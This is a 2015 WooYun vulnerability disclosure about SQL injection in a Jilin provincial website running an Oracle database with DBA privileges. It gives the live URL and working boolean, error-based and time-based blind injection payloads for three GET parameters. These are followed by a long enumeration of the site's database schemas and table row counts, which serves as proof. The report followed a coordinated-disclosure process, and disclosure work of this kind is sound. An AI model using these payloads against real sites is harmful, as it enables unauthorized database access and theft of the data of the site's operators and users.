当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120440

漏洞标题:吉林省某网站存在SQL注入漏洞且权限为DBA、可导致大量信息泄漏

相关厂商:cncert国家互联网应急中心

漏洞作者: 水木之原

提交时间:2015-06-17 14:45

修复时间:2015-08-06 09:36

公开时间:2015-08-06 09:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-22: 厂商已经确认,细节仅向厂商公开
2015-07-02: 细节向核心白帽子及相关领域专家公开
2015-07-12: 细节向普通白帽子公开
2015-07-22: 细节向实习白帽子公开
2015-08-06: 细节向公众公开

简要描述:

RT

详细说明:

漏洞地址:

http://www.jl54.org/jlgqt/public/content.jsp?id=73126&classid=1220000000&mainid=1220000000


id、classid、mainid均存在盲注,数据库为oracle

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=73453' AND 5720=5720 AND 'TBbY'='TBbY&classid=1210100000&mainid=1210000000
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=73453' AND 5206=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(112)
||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5206=5206) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(11
8)||CHR(106)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'qyNc'='qyNc&classid=1210100000&mainid=12
10000000
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=73453' AND 6534=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(78)||CHR(99)||CHR(75),5) AND
'qjQW'='qjQW&classid=1210100000&mainid=1210000000
Parameter: classid (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=73453&classid=1210100000' AND 5992=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)|
|CHR(118)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5992=5992) THEN 1 ELSE 0 END) FROM DUAL
)||CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZcIP'='ZcIP&mainid=12
10000000
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=73453&classid=1210100000' AND 9993=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(119)||CHR(
85)||CHR(86),5) AND 'Fmlh'='Fmlh&mainid=1210000000
Parameter: mainid (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=73453&classid=1210100000&mainid=1210000000' AND 5352=(SELECT UPPER(XMLType(CHR(60)||
CHR(58)||CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5352=5352) THEN 1 ELS
E 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(106)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'Nnm
v'='Nnmv
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=73453&classid=1210100000&mainid=1210000000' AND 5342=DBMS_PIPE.RECEIVE_MESSAGE(CHR(6
8)||CHR(101)||CHR(76)||CHR(100),5) AND 'rGWy'='rGWy
---


漏洞证明:

数据库:

数据库.jpg


Database: ORDSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SI_IMAGE_FORMATS_TAB           | 17      |
| SI_VALUES_TAB                  | 8       |
| SI_FEATURES_TAB                | 4       |
+--------------------------------+---------+
Database: WEBDB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| LLJSB                          | 3431435 |
| KDCB                           | 14019   |
| WZB                            | 12367   |
| UPFILE                         | 5153    |
| LMB                            | 879     |
| LMGXB                          | 226     |
| WEBGNB                         | 155     |
| OUTYHB                         | 74      |
| XXJL                           | 54      |
| GGSET                          | 48      |
| WEBYHB                         | 14      |
| TEMP                           | 7       |
| DCXXB                          | 4       |
| WEBOPEN                        | 1       |
+--------------------------------+---------+
Database: HR
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EMPLOYEES                      | 107     |
| DEPARTMENTS                    | 27      |
| COUNTRIES                      | 25      |
| LOCATIONS                      | 23      |
| JOBS                           | 19      |
| JOB_HISTORY                    | 10      |
| REGIONS                        | 4       |
+--------------------------------+---------+
Database: OLAPSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| CWM$ITEMUSE                    | 118     |
| CWM$LEVELATTRIBUTE             | 67      |
| CWM$CLASSIFICATIONENTRY        | 66      |
| CWM$ITEMMAP                    | 59      |
| CWM$CLASSIFICATION             | 42      |
| CWM2$MRALL_DESCRIPTORS         | 41      |
| CWM$LEVEL                      | 27      |
| CWM$DIMENSIONATTRIBUTE         | 23      |
| CWM$DOMAIN                     | 21      |
| CWM$CLASSIFICATIONTYPE         | 15      |
| CWM$OBJECTTYPE                 | 15      |
| CWM$FUNCTION                   | 14      |
| CWM$CUBEDIMENSIONUSE           | 9       |
| CWM$FACTLEVELUSE               | 9       |
| CWM$HIERARCHY                  | 7       |
| CWM$DIMENSION                  | 5       |
| CWM$PARAMETER                  | 5       |
| CWM$FACTUSE                    | 4       |
| CWM$FUNCTIONUSE                | 4       |
| CWM$MEASURE                    | 4       |
| CWM$MEASUREDIMENSIONUSE        | 4       |
| CWM2$AWDIMLOADPARM             | 4       |
| CWM$MODEL                      | 3       |
| CWM$PROJECT                    | 3       |
| CWM$CUBE                       | 2       |
| CWM$FACTLEVELGROUP             | 2       |
| CWM$FACTTABLEMAP               | 2       |
| CWM2$AWCUBELOADTYPE            | 2       |
| CWM2$AWDIMLOADTYPE             | 2       |
| CWM2$AWCUBELOADPARM            | 1       |
+--------------------------------+---------+
Database: JLGQT
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| T_LOG                          | 67637   |
| T_STATISTICS                   | 43992   |
| T_VISCERA_PICTURE              | 35971   |
| T_VISCERA_TITLE                | 35613   |
| T_GONGQIU                      | 588     |
| T_CATALOG                      | 506     |
| BIRTHDAYTIP                    | 400     |
| T_USER_ABILITY                 | 383     |
| T_WORD_BAK                     | 238     |
| T_REPLY                        | 161     |
| T_QIUZHI                       | 158     |
| T_VIDEO                        | 118     |
| T_JIAZHENG                     | 112     |
| T_FRIEND                       | 108     |
| T_POLL_REASON                  | 102     |
| T_POLL_DETAIL                  | 81      |
| T_WORDBACK_BAK                 | 62      |
| T_USER_ROLE                    | 59      |
| T_CODE_DET                     | 55      |
| T_QIYE                         | 55      |
| T_USER                         | 51      |
| LEADMANAGE                     | 38      |
| T_BALLOT                       | 31      |
| T_WORDBACK                     | 30      |
| T_LIVE_REPLY                   | 21      |
| T_POLL                         | 18      |
| T_WORD                         | 17      |
| T_FANGTAN                      | 14      |
| T_CODE                         | 12      |
| T_INFO_ATTACH                  | 8       |
| T_PERSON                       | 5       |
| T_SCORE                        | 5       |
| T_LIVE_CAST                    | 2       |
| T_PROBLEM                      | 1       |
+--------------------------------+---------+
Database: CMS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SINEW_NEWS                     | 155     |
| SINEW_CATALOG                  | 35      |
| SINEW_SPREAD                   | 8       |
| SINEW_ROLE_ABILITY             | 7       |
| SINEW_USER_ROLE                | 5       |
| SINEW_USER                     | 2       |
+--------------------------------+---------+
Database: XDB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| XDB$H_INDEX                    | 51      |
| XDB$NMSPC_ID                   | 7       |
| XDB$QNAME_ID                   | 7       |
| MIGR9202STATUS                 | 1       |
| XDB$ROOT_INFO                  | 1       |
+--------------------------------+---------+
Database: JLSKFQ
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SS_ERROR                       | 177     |
| DEPARTMENT                     | 119     |
| KF_HY                          | 117     |
| SS_MESSAGE                     | 42      |
| ROLEMENU                       | 25      |
| PROGRAM                        | 15      |
| CODE                           | 14      |
| ITME                           | 13      |
| TYPE                           | 10      |
| FOLD                           | 8       |
| CODETYPE                       | 4       |
| ROLE                           | 4       |
| SYSUSER                        | 4       |
| T_MAIN                         | 4       |
| USERROLE                       | 4       |
| QYJBQK                         | 3       |
| DGQKB                          | 2       |
| NNQYQK                         | 1       |
| QY_TYPE                        | 1       |
| SYSPARM                        | 1       |
| ZJQKB                          | 1       |
+--------------------------------+---------+
Database: DBSNMP
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| MGMT_BSLN_METRICS              | 15      |
+--------------------------------+---------+
Database: MDSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SDO_COORD_OP_PARAM_VALS        | 9529    |
| SDO_COORD_REF_SYS              | 4384    |
| SDO_CS_SRS                     | 4384    |
| SDO_COORD_OPS                  | 2244    |
| SDO_COORD_OP_PARAM_USE         | 680     |
| SDO_DATUMS                     | 530     |
| SDO_COORD_OP_PATHS             | 365     |
| SDO_COORD_OP_PARAMS            | 153     |
| SDO_COORD_AXES                 | 139     |
| SDO_UNITS_OF_MEASURE           | 128     |
| SDO_DATUMS_OLD_SNAPSHOT        | 118     |
| SDO_ELLIPSOIDS                 | 94      |
| MD$RELATE                      | 92      |
| SDO_COORD_OP_METHODS           | 82      |
| SDO_STYLES_TABLE               | 78      |
| SDO_COORD_SYS                  | 65      |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT    | 47      |
| SDO_PROJECTIONS_OLD_SNAPSHOT   | 42      |
| SDO_COORD_AXIS_NAMES           | 28      |
| SDO_PRIME_MERIDIANS            | 16      |
| SDO_XML_SCHEMAS                | 4       |
| SDO_GEOR_XMLSCHEMA_TABLE       | 1       |
+--------------------------------+---------+
Database: CTXSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| DR$DBO                         | 333     |
| DR$NUMBER_SEQUENCE             | 256     |
| DR$INDEX_VALUE                 | 236     |
| DR$OBJECT_ATTRIBUTE            | 186     |
| DR$OBJECT_ATTRIBUTE_LOV        | 120     |
| DR$STOPWORD                    | 114     |
| DR$OBJECT                      | 50      |
| DR$PARAMETER                   | 29      |
| DR$PREFERENCE                  | 25      |
| DR$INDEX_OBJECT                | 18      |
| DR$CLASS                       | 12      |
| DR$PREFERENCE_VALUE            | 9       |
| DR$SECTION_GROUP               | 5       |
| DR$STOPLIST                    | 3       |
| DR$INDEX                       | 2       |
| DR$INDEX_SET                   | 1       |
| DR$STATS                       | 1       |
+--------------------------------+---------+
Database: WMSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WM$SYSPARAM_ALL_VALUES         | 16      |
| WM$EVENTS_INFO                 | 12      |
| WM$WORKSPACE_PRIV_TABLE        | 8       |
| WM$ENV_VARS                    | 2       |
| AQ$_WM$EVENT_QUEUE_TABLE_S     | 1       |
| WM$NEXTVER_TABLE               | 1       |
| WM$VERSION_HIERARCHY_TABLE     | 1       |
| WM$WORKSPACES_TABLE            | 1       |
+--------------------------------+---------+
Database: PM
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| ONLINE_MEDIA                   | 9       |
| PRINT_MEDIA                    | 4       |
+--------------------------------+---------+
Database: IX
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| AQ$_ORDERS_QUEUETABLE_S        | 4       |
| AQ$_STREAMS_QUEUE_TABLE_S      | 1       |
+--------------------------------+---------+
Database: NEWGQT
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| T_VISCERA_TITLE                | 11294   |
| T_VISCERA                      | 8656    |
| T_VISCERA_PICTURE              | 5716    |
| T_CATALOG                      | 850     |
| T_CATALOG_BAK                  | 402     |
| T_USER_ABILITY                 | 384     |
| T_CODE_DET                     | 110     |
| T_USER_ROLE                    | 99      |
| T_WORD                         | 86      |
| T_USER                         | 76      |
| T_WORDBACK                     | 39      |
| T_PERSON                       | 20      |
| T_VIDEO                        | 1       |
+--------------------------------+---------+
Database: EXFSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| RLM$VALIDPRIVS                 | 17      |
| EXF$VALIDIOPER                 | 15      |
| RLM$RULESETSTCODE              | 8       |
| EXF$VALIDPRIVS                 | 3       |
| EXF$PARAMETER                  | 2       |
| EXF$VERSION                    | 1       |
+--------------------------------+---------+
Database: OE
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| PRODUCT_DESCRIPTIONS           | 8640    |
| INVENTORIES                    | 1112    |
| ORDER_ITEMS                    | 665     |
| CUSTOMERS                      | 319     |
| PRODUCT_INFORMATION            | 288     |
| ORDERS                         | 105     |
| WAREHOUSES                     | 9       |
| PROMOTIONS                     | 2       |
+--------------------------------+---------+
Database: SYSTEM
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| HELP                           | 978     |
| LOGSTDBY$SKIP_SUPPORT          | 103     |
| MVIEW$_ADV_PARAMETERS          | 40      |
| REPCAT$_OBJECT_TYPES           | 28      |
| AQ$_QUEUES                     | 27      |
| REPCAT$_RESOLUTION_METHOD      | 19      |
| AQ$_QUEUE_TABLES               | 14      |
| AQ$_INTERNET_AGENTS            | 4       |
| AQ$_INTERNET_AGENT_PRIVS       | 3       |
| REPCAT$_TEMPLATE_STATUS        | 3       |
| REPCAT$_AUDIT_ATTRIBUTE        | 2       |
| REPCAT$_TEMPLATE_TYPES         | 2       |
+--------------------------------+---------+
Database: SYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WRI$_OPTSTAT_HISTGRM_HISTORY   | 341668  |
| SOURCE$                        | 292729  |
| AQ$_ALERT_QT_T                 | 261175  |
| ALERT_QT                       | 261042  |
| AQ$_ALERT_QT_H                 | 261042  |
| AQ$_ALERT_QT_I                 | 261042  |
| DEPENDENCY$                    | 106721  |
| ARGUMENT$                      | 78671   |
| ACCESS$                        | 72961   |
| WRH$_LATCH                     | 69906   |
| WRH$_SYSSTAT                   | 66429   |
| COL$                           | 57442   |
| OBJ$                           | 51964   |
| WRH$_PARAMETER                 | 48312   |
| WRI$_OPTSTAT_HISTHEAD_HISTORY  | 44318   |
| HISTGRM$                       | 42375   |
| WRI$_ADV_PARAMETERS            | 38937   |
| IDL_UB1$                       | 29888   |
| SETTINGS$                      | 29337   |
| WRH$_LATCH_MISSES_SUMMARY      | 29012   |
| OBJAUTH$                       | 23997   |
| WRH$_SYSMETRIC_SUMMARY         | 23584   |
| WRH$_SERVICE_STAT              | 20496   |
| SYN$                           | 20026   |
| WRH$_WAITCLASSMETRIC_HISTORY   | 19596   |
| HIST_HEAD$                     | 18199   |
| PROCEDUREINFO$                 | 17274   |
| WRH$_SYSTEM_EVENT              | 16104   |
| WRH$_SQLSTAT                   | 14823   |
| WRH$_SEG_STAT                  | 12247   |
| JAVASNM$                       | 11562   |
| PROCEDUREPLSQL$                | 11373   |
| WRH$_ENQUEUE_STAT              | 11088   |
| COM$                           | 10979   |
| IDL_SB4$                       | 10650   |
| PARAMETER$                     | 8767    |
| IDL_UB2$                       | 7458    |
| ATTRIBUTE$                     | 7192    |
| WRH$_SQL_PLAN                  | 7179    |
| WRH$_ROWCACHE_SUMMARY          | 6954    |
| CCOL$                          | 6604    |
| METASCRIPTFILTER$              | 6008    |
| CON$                           | 5562    |
| CDEF$                          | 5561    |
| SEG$                           | 5002    |
| WRH$_BG_EVENT_SUMMARY          | 4794    |
| WRH$_SGASTAT                   | 4459    |
| WARNING_SETTINGS$              | 4291    |
| WRI$_OPTSTAT_TAB_HISTORY       | 4165    |
| ICOL$                          | 3824    |
| WRH$_DB_CACHE_ADVICE           | 3813    |
| VIEW$                          | 3671    |
| JAVAOBJ$                       | 3615    |
| IDL_CHAR$                      | 3522    |
| WRH$_SYS_TIME_MODEL            | 3477    |
| METAFILTER$                    | 3314    |
| WRH$_SERVICE_WAIT_CLASS        | 3294    |
| WRH$_WAITSTAT                  | 3294    |
| METHOD$                        | 3191    |
| WRI$_OPTSTAT_IND_HISTORY       | 3122    |
| WRH$_ACTIVE_SESSION_HISTORY    | 3021    |
| WRH$_PGASTAT                   | 2999    |
| METANAMETRANS$                 | 2499    |
| WRH$_PGA_TARGET_ADVICE         | 2464    |
| IND$                           | 2406    |
| RESULT$                        | 2334    |
| WRH$_TABLESPACE_SPACE_USAGE    | 2288    |
| OID$                           | 2249    |
| WRH$_SHARED_POOL_ADVICE        | 2232    |
| COL_USAGE$                     | 2231    |
| WRH$_FILESTATXS                | 2196    |
| WRH$_TABLESPACE_STAT           | 2196    |
| PROCEDURE$                     | 2159    |
| VTABLE$                        | 2117    |
| TYPE_MISC$                     | 2032    |
| WRH$_LIBRARYCACHE              | 1936    |
| WRH$_SQL_WORKAREA_HISTOGRAM    | 1936    |
| TYPE$                          | 1926    |
| WRI$_ADV_MESSAGE_GROUPS        | 1905    |
| WRH$_OSSTAT                    | 1830    |
| COLTYPE$                       | 1766    |
| TAB$                           | 1727    |
| SCHEDULER$_EVENT_LOG           | 1650    |
| SMON_SCN_TIME                  | 1607    |
| SCHEDULER$_JOB_RUN_DETAILS     | 1597    |
| WRH$_SQLTEXT                   | 1573    |
| PROCEDUREC$                    | 1399    |
| WRH$_PARAMETER_NAME            | 1385    |
| ATTRCOL$                       | 1316    |
| WRH$_SGA_TARGET_ADVICE         | 1232    |
| WRH$_SQL_BIND_METADATA         | 1201    |
| WRI$_ADV_FINDINGS              | 1189    |
| WRH$_UNDOSTAT                  | 1056    |
| AW_OBJ$                        | 924     |
| WRH$_RESOURCE_LIMIT            | 880     |
| WRH$_EVENT_NAME                | 874     |
| HS$_BASE_CAPS                  | 803     |
| SYSAUTH$                       | 767     |
| WRI$_ADV_TASKS                 | 753     |
| WRH$_PROCESS_MEMORY_SUMMARY    | 704     |
| WRH$_SGA                       | 704     |
| METAXSLPARAM$                  | 703     |
| METASCRIPT$                    | 684     |
| WRH$_SEG_STAT_OBJ              | 684     |
| PROCEDUREJAVA$                 | 623     |
| METAPATHMAP$                   | 608     |
| FIXED_OBJ$                     | 597     |
| LOB$                           | 572     |
| COLLECTION$                    | 560     |
| TRIGGERCOL$                    | 549     |
| WRH$_JAVA_POOL_ADVICE          | 528     |
| WRH$_LOG                       | 528     |
| STATS_TARGET$                  | 447     |
| METAVIEW$                      | 423     |
| INDPART$                       | 409     |
| WRH$_LATCH_NAME                | 382     |
| WRH$_STAT_NAME                 | 380     |
| WRI$_ADV_DEF_PARAMETERS        | 336     |
| WRI$_ALERT_HISTORY             | 312     |
| PS$                            | 288     |
| TABPART$                       | 254     |
| TYPED_VIEW$                    | 252     |
| METAXSL$                       | 248     |
| MON_MODS_ALL$                  | 247     |
| OPARG$                         | 242     |
| SEQ$                           | 215     |
| WRH$_METRIC_NAME               | 211     |
| STMT_AUDIT_OPTION_MAP          | 205     |
| NTAB$                          | 200     |
| WRI$_ADV_OBJECTS               | 200     |
| AW$AWMD                        | 198     |
| WRI$_ADV_ACTIONS               | 183     |
| WRI$_ADV_REC_ACTIONS           | 183     |
| WRH$_BUFFER_POOL_STATISTICS    | 176     |
| WRH$_INSTANCE_RECOVERY         | 176     |
| WRH$_SQL_SUMMARY               | 176     |
| WRH$_TEMPSTATXS                | 176     |
| WRH$_THREAD                    | 176     |
| WRM$_SNAPSHOT                  | 176     |
| TRIGGER$                       | 171     |
| SYSTEM_PRIVILEGE_MAP           | 166     |
| PARTCOL$                       | 161     |
| AUDIT_ACTIONS                  | 160     |
| WRI$_ADV_RATIONALE             | 154     |
| WRI$_ADV_RECOMMENDATIONS       | 153     |
| MON_MODS$                      | 151     |
| LIBRARY$                       | 150     |
| OLAP_OLEDB_KEYWORDS            | 148     |
| OLAP_OLEDB_FUNCTIONS_PVT       | 147     |
| WRM$_DATABASE_INSTANCE         | 138     |
| AW$AWXML                       | 121     |
| KU_NOEXP_TAB                   | 119     |
| PARTOBJ$                       | 116     |
| OPBINDING$                     | 112     |
| TYPEHIERARCHY$                 | 111     |
| HS$_BASE_DD                    | 102     |
| SCHEDULER$_PROGRAM_ARGUMENT    | 102     |
| OPQTYPE$                       | 95      |
| XDB_INSTALLATION_TAB           | 94      |
| OLAP_OLEDB_MDPROPVALS          | 93      |
| JAVA$POLICY$                   | 91      |
| EXPDEPOBJ$                     | 90      |
| INDOP$                         | 88      |
| AW$EXPRESS                     | 81      |
| METASTYLESHEET                 | 80      |
| NOEXP$                         | 80      |
| WRI$_DBU_FEATURE_METADATA      | 79      |
| WRI$_DBU_FEATURE_USAGE         | 79      |
| SUBCOLTYPE$                    | 73      |
| DIMATTR$                       | 72      |
| WRH$_SYSMETRIC_HISTORY         | 72      |
| USER$                          | 67      |
| BOOTSTRAP$                     | 57      |
| OPERATOR$                      | 57      |
| OLAP_OLEDB_MDPROPS             | 54      |
| REFCON$                        | 54      |
| AW$AWCREATE                    | 51      |
| EXPPKGACT$                     | 47      |
| EXPDEPACT$                     | 38      |
| ERROR$                         | 37      |
| LOGMNR_INTERESTING_COLS        | 34      |
| PROFILE$                       | 34      |
| HIERLEVEL$                     | 31      |
| UTL_RECOMP_COMPILED            | 31      |
| TSQ$                           | 29      |
| AW$AWCREATE10G                 | 27      |
| AW$AWREPORT                    | 27      |
| DIMLEVEL$                      | 27      |
| DIMLEVELKEY$                   | 27      |
| ICOLDEP$                       | 27      |
| PROPS$                         | 27      |
| RLS$                           | 27      |
| WRI$_OPTSTAT_OPR               | 27      |
| SCHEDULER$_WINDOW_DETAILS      | 26      |
| TABLE_PRIVILEGE_MAP            | 24      |
| OPANCILLARY$                   | 23      |
| WRI$_ALERT_THRESHOLD           | 22      |
| UNDO$                          | 21      |
| JACCELERATOR$DLLS              | 20      |
| RULE_SET_FOB$                  | 20      |
| WRI$_SEGADV_OBJLIST            | 20      |
| EXPPKGOBJ$                     | 19      |
| RULE_SET$                      | 19      |
| ASSOCIATION$                   | 18      |
| EXPACT$                        | 17      |
| REGISTRY$                      | 17      |
| WRI$_DBU_HIGH_WATER_MARK       | 17      |
| WRI$_DBU_HWM_METADATA          | 17      |
| RESOURCE_MAP                   | 16      |
| RULE_SET_NL$                   | 16      |
| AQ$_QUEUE_TABLE_AFFINITIES     | 14      |
| RULE_EC$                       | 14      |
| RULE_SET_IOT$                  | 14      |
| TS$                            | 14      |
| AUX_STATS$                     | 13      |
| DUC$                           | 12      |
| FILE$                          | 12      |
| OLAP$ALTER_SESSION             | 12      |
| OPTSTAT_HIST_CONTROL$          | 12      |
| SCHEDULER$_PROGRAM             | 12      |
| WRH$_DATAFILE                  | 12      |
| RESOURCE_MAPPING_PRIORITY$     | 11      |
| WRH$_OPTIMIZER_ENV             | 11      |
| CLU$                           | 10      |
| INDTYPES$                      | 10      |
| JAVA$POLICY$SHARED$TABLE       | 10      |
| REC_TAB$                       | 10      |
| RESOURCE_COST$                 | 10      |
| RULE_SET_RDEP$                 | 10      |
| WRH$_OSSTAT_NAME               | 10      |
| USER_ASTATUS_MAP               | 9       |
| DIR$                           | 8       |
| EXPIMP_TTS_CT$                 | 8       |
| RULE_MAP$                      | 8       |
| RULE_SET_EE$                   | 8       |
| RULE_SET_RE$                   | 8       |
| RULE_SET_ROR$                  | 8       |
| WRI$_ADV_DEFINITIONS           | 8       |
| WRI$_ADV_USAGE                 | 8       |
| HIER$                          | 7       |
| WRI$_SCH_VOTES                 | 7       |
| AW$                            | 6       |
| REC_VAR$                       | 6       |
| RESOURCE_PLAN_DIRECTIVE$       | 6       |
| SCHEDULER$_GLOBAL_ATTRIBUTE    | 6       |
| SCHEDULER$_JOB                 | 6       |
| SERVICE$                       | 6       |
| WRI$_SEGADV_CNTRLTAB           | 6       |
| AQ$_ALERT_QT_S                 | 5       |
| CONTEXT$                       | 5       |
| DIM$                           | 5       |
| REGISTRY$SCHEMAS               | 5       |
| RESOURCE_CONSUMER_GROUP$       | 5       |
| SNAP_LOGDEP$                   | 5       |
| SNAP_REFTIME$                  | 5       |
| SUMDEP$                        | 5       |
| SUMDETAIL$                     | 5       |
| SUMKEY$                        | 5       |
| AQ$_SCHEDULER$_JOBQTAB_S       | 4       |
| RULE$                          | 4       |
| SQL_VERSION$                   | 4       |
| SUMPRED$                       | 4       |
| WRH$_SERVICE_NAME              | 4       |
| AQ$_AQ$_MEM_MC_S               | 3       |
| AQ$_SYS$SERVICE_METRICS_TAB_S  | 3       |
| ATTRIBUTE_TRANSFORMATIONS$     | 3       |
| RESOURCE_PLAN$                 | 3       |
| SNAP_LOADERTIME$               | 3       |
| STREAMS$_MESSAGE_RULES         | 3       |
| SUMJOIN$                       | 3       |
| TRANSFORMATIONS$               | 3       |
| CDC_CHANGE_SOURCES$            | 2       |
| PROFNAME$                      | 2       |
| REG_SNAP$                      | 2       |
| REGISTRY$LOG                   | 2       |
| RESOURCE_GROUP_MAPPING$        | 2       |
| RULE_SET_TE$                   | 2       |
| SCHEDULER$_CLASS               | 2       |
| SCHEDULER$_WINDOW              | 2       |
| SCHEDULER$_WINGRP_MEMBER       | 2       |
| SNAP$                          | 2       |
| SNAP_REFOP$                    | 2       |
| STREAMS$_MESSAGE_CONSUMERS     | 2       |
| SUM$                           | 2       |
| SUMAGG$                        | 2       |
| SUMQB$                         | 2       |
| TRIGGERJAVAC$                  | 2       |
| TRIGGERJAVAF$                  | 2       |
| TRIGGERJAVAM$                  | 2       |
| TRIGGERJAVAS$                  | 2       |
| USTATS$                        | 2       |
| WRI$_DBU_CPU_USAGE_SAMPLE      | 2       |
| "DUAL"                         | 1       |
| AQ$_KUPC$DATAPUMP_QUETAB_S     | 1       |
| AQ$_SCHEDULER$_EVENT_QTAB_S    | 1       |
| AURORA$SHUTDOWN$CLASSES$       | 1       |
| AURORA$STARTUP$CLASSES$        | 1       |
| CDC_CHANGE_SETS$               | 1       |
| CDC_SYSTEM$                    | 1       |
| DBMS_LOCK_ALLOCATED            | 1       |
| DIMJOINKEY$                    | 1       |
| EXTERNAL_LOCATION$             | 1       |
| EXTERNAL_TAB$                  | 1       |
| HS$_FDS_CLASS                  | 1       |
| HS$_FDS_CLASS_DATE             | 1       |
| ID_GENS$                       | 1       |
| INCVID                         | 1       |
| JAVA$JVM$STATUS                | 1       |
| JAVA$PREFS$                    | 1       |
| JOB$                           | 1       |
| KOPM$                          | 1       |
| LOBFRAG$                       | 1       |
| MIGRATE$                       | 1       |
| PARTLOB$                       | 1       |
| RECENT_RESOURCE_INCARNATIONS$  | 1       |
| REG$                           | 1       |
| RULE_SET_IEUAC$                | 1       |
| SCHEDULER$_SCHEDULE            | 1       |
| SCHEDULER$_WINDOW_GROUP        | 1       |
| SUPEROBJ$                      | 1       |
| TRUSTED_LIST$                  | 1       |
| VIEWTRCOL$                     | 1       |
| WRH$_TEMPFILE                  | 1       |
| WRI$_DBU_CPU_USAGE             | 1       |
| WRI$_DBU_USAGE_SAMPLE          | 1       |
| WRI$_SCH_CONTROL               | 1       |
| WRM$_WR_CONTROL                | 1       |
+--------------------------------+---------+
Database: SH
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SALES                          | 918843  |
| COSTS                          | 82112   |
| CUSTOMERS                      | 55500   |
| FWEEK_PSCAT_SALES_MV           | 11266   |
| SUPPLEMENTARY_DEMOGRAPHICS     | 4500    |
| TIMES                          | 1826    |
| PROMOTIONS                     | 503     |
| PRODUCTS                       | 72      |
| CAL_MONTH_SALES_MV             | 48      |
| COUNTRIES                      | 23      |
| DR$SUP_TEXT_IDX$R              | 22      |
| CHANNELS                       | 5       |
+--------------------------------+---------+
Database: SCOTT
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EMP                            | 14      |
| SALGRADE                       | 5       |
| DEPT                           | 4       |
+--------------------------------+---------+
Database: SYSMAN
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| MGMT_ARU_PRODUCT_RELEASE_MAP   | 2621    |
| MGMT_METRICS                   | 2578    |
| MGMT_JOB_STEP_PARAMS           | 1128    |
| MGMT_HC_OS_COMPONENTS          | 1090    |
| MGMT_HC_VENDOR_SW_COMPONENTS   | 1090    |
| MGMT_HC_VENDOR_SW_SUMMARY      | 1090    |
| MGMT_ARU_FAMILY_PRODUCT_MAP    | 579     |
| MGMT_ARU_PRODUCTS              | 524     |
| MGMT_DB_INIT_PARAMS_ECM        | 516     |
| MGMT_ECM_SNAPSHOT_MD_COLUMNS   | 506     |
| MGMT_HC_OS_PROPERTIES          | 491     |
| MGMT_METRICS_RAW               | 452     |
| MGMT_JOB_EXECPLAN              | 366     |
| MGMT_ARU_OUI_COMPONENTS        | 319     |
| MGMT_ARU_RELEASES              | 301     |
| MGMT_SYSTEM_PERFORMANCE_LOG    | 298     |
| MGMT_INV_DEPENDENCY_RULE       | 218     |
| MGMT_METRIC_THRESHOLDS         | 209     |
| MGMT_JOB_TYPE_DISPLAY_PARAM    | 172     |
| MGMT_JOB_PARAM_SOURCE          | 140     |
| MGMT_POLICY_RULE_DEF_COLUMNS   | 111     |
| MGMT_TARGET_ROLLUP_TIMES       | 110     |
| MGMT_INV_COMPONENT             | 107     |
| MGMT_METRIC_COLLECTIONS        | 102     |
| MGMT_CURRENT_METRICS           | 101     |
| MGMT_ECM_SNAPSHOT_MD_TABLES    | 77      |
| MGMT_JOB_TYPE_URI_INFO         | 61      |
| MGMT_POLICY_RULE               | 55      |
